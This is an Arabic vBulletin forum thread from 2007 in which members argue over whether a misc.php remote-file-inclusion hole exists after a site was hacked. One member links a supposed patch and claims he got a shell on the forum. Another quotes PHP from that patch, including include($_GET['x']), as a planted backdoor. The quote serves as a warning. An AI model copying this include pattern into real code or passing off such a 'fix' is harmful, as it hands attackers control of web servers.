اللي نكروا الموضوع misc.php

**الثلج** · 14-01-2007

http://www.w-enter.com/forum/

نبي حل سريع

**© بندر ©** · 14-01-2007

وش السالفة ؟

**:: W-ENTER ::** · 14-01-2007

نعم تم اختراق الموقع بواسطة HAKING MASTER

وقام بحذف الاعضاء والمواضيع والاقسام

والسبب انه يبي يسوي حمله على مواقع الدعم العربيه

مع العلم ان موقعي ليس موقع دعم وانما موقع للتصميم فقط

ولكن ماصدق شاف ثغره وحب يستمتع

حسبي الله ونعم اوكيل

**سبعات** · 14-01-2007

ايش هي الثغرة ممكن شوية توضيح

**أبو سالم** · 17-01-2007

W-enter
اخترق؟
حسبي الله ونعم الوكيل
موقع مافيه ذرة شبهه موقع تعليمي بحت
اخوي الثغرة الي قلت عنها الكهف قال انها خاطئة
ومافي ثغرة
شسالفة ياجماعة؟

**Barakat** · 18-01-2007

لا حول ولا قوه الا بالله

والله ما انا فاهم شو قصه هل العالم هذه .

**oO(الباسل)oO** · 18-01-2007

اخوي

:: W-ENTER ::

اذا محتاج مساعدة! .. لايردك الا لسانك وكيبوردك

احنا بخدمة الوجيه الطيبه

**m7bobh** · 18-01-2007

اخوي

:: W-ENTER ::

اذا محتاج مساعدة! .. لايردك الا لسانك وكيبوردك

احنا بخدمة الوجيه الطيبه

**أبو سالم** · 18-01-2007

ياريت ياجماعة يجي ويتأكد اخونا الكهف يشوف السالفة

**The Shifty** · 21-01-2007

السلام عليكم و رحمة الله و بركاته

هنا الثغرة

السلام عليكم و رحمة الله و بركاته

1-درجة خطورة الثغره : خطيرة جداً جداً جداً جداً (( يدعوها الهاكرز Remote file include و هي تسمح بربط ملف شـــل يسمح بالتحكم بكل السيرفر و ليس المنتدى أو الموقع المستهدف فحسب ))
2- مكتشف الثغره أو الترقيع : BlueGhost
3-المصدر : منتديات المرافق

نبدأ الشرح بسم الله الرحمن الرحيم

بعد تحميلك للملف اللي في المرفقات

فك ضغطه

تطلعلك مجلدات كثيرة

كل مجلد إسمه حسب إصدار vbulletin

صورة :

أدخل المجلد المناسب لإصدار منتداك

تلاقي بداخله ملف misc.php متناسب مع إصدار منتداك

إرفعه في مجلد منتداك ( إفتراضياً يكون vb )

---

إنتهينا

و السلام عليكم و رحمة الله و بركاته

لقيتها في منتدى ثاني و حبيت أنشرها لكم

الثغرة أكتشفت بعد صدور النسخة 3.6.2
و هي موجودة بكل النسخ

ملفات الترقيع هنااااااااااااااااا http://www.m5zn.com/download3.php?fi...0a56121fd2.zip

وأنا جربت الثغرة على منتداكم و هي شغاااااااااااااااااااااااااااااالة و تمكنت من دخول الشل و العبث بكل شئ إلا أن نفسي لم تطاوعني

و السلام عليكم و رحمة الله و بركاته

زائرb9n9 · 21-01-2007

هذه الثغره كذبه

والملف الموضوع بالرد السابق فيه اكواد تجعل المنتدى سهل الاختراق

كود:

$f=trim($f); 
echo ini_get("safe_mode"); 
echo ini_get("open_basedir"); 
include("$f"); 
ini_restore("safe_mode"); 
ini_restore("open_basedir"); 
echo ini_get("safe_mode"); 
echo ini_get("open_basedir"); 
include("$f"); 
include($_GET['x']);

ارجو الانتباه من هذه الكذبه التي انتشرت بالمنتديات

**Barakat** · 21-01-2007

المشاركة الأصلية كتبت بواسطة الثلج

http://www.w-enter.com/forum/

نبي حل سريع

بس هو سؤال واحد فقط اخوي و لاتفهم قصدي خطأ

انت شو عرفك انه منتدى الاخ مازن تم اختراقه بواسطه هذه الثغره كما تدعي ؟

ممكن يكون ثغره ثانيه وليس لها اي علاقه بهذا يلي تتكلم به!!!

**The Shifty** · 21-01-2007

المشاركة الأصلية كتبت بواسطة b9n9

هذه الثغره كذبه

والملف الموضوع بالرد السابق فيه اكواد تجعل المنتدى سهل الاختراق

كود:

$f=trim($f); 
echo ini_get("safe_mode"); 
echo ini_get("open_basedir"); 
include("$f"); 
ini_restore("safe_mode"); 
ini_restore("open_basedir"); 
echo ini_get("safe_mode"); 
echo ini_get("open_basedir"); 
include("$f"); 
include($_GET['x']);

ارجو الانتباه من هذه الكذبه التي انتشرت بالمنتديات

مع أني لا أفهم بالبرمجة لكني أشهد أنه لما رقعت بهذا الملف إختفت الثغرة ( لأني أعرف إستغلالها )

المشاركة الأصلية كتبت بواسطة Barakat

بس هو سؤال واحد فقط اخوي و لاتفهم قصدي خطأ

انت شو عرفك انه منتدى الاخ مازن تم اختراقه بواسطه هذه الثغره كما تدعي ؟

ممكن يكون ثغره ثانيه وليس لها اي علاقه بهذا يلي تتكلم به!!!

الهاكر لما إخترق w-enter كتب أنه إخترقه بواسطة ثغرة misc.php

الثغرة موجووووووودة يرجى الترقيع حالاً و إنتوا ما راح تخسروا شئ .. خذوها نصيحة مجرب

**Moon4ae** · 21-01-2007

أنا متأكد أن الثغره غير موجوده ..

**Barakat** · 22-01-2007

مع احترامي اخواني لا اعتقد بان الثغره موجوده اصلا بملف misc.php

على ايه حال سوف اتأكد واردلكم خبر بعد قليل

الموضوع: اللي نكروا الموضوع misc.php

أدوات الموضوع

بحث في الموضوع

اللي نكروا الموضوع misc.php

ضوابط المشاركة